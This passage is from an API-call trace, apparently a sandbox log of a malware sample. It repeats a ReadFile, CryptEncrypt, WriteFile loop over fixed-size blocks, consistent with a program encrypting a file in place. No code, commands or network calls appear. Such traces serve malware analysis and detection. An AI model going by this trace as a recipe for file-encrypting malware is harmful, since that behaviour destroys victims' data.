lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.651] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.651] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.651] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.651] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.651] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.651] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.651] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.651] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.651] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.652] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.652] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.652] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.652] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.652] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.652] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.652] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.652] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.652] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.652] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.652] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.652] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.652] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.652] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.653] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.653] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.653] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.653] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.653] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.653] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.653] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.653] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.653] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.653] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.653] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.653] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.653] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.653] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.653] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.653] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.654] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.654] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.654] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.654] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.654] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.654] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.654] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.654] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.654] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.654] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.654] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.654] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.654] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.654] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.654] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.654] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.654] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.655] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.655] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.655] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.655] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.655] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.655] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.655] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.655] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.655] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.655] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.655] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.655] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.655] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.656] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.656] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.656] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.656] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.656] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.656] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.656] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.656] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.656] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.656] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.657] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.657] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.657] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.657] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.657] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.657] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.657] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.657] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.657] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.657] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.657] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.657] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.657] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.658] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.658] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.658] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.658] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.658] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.658] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 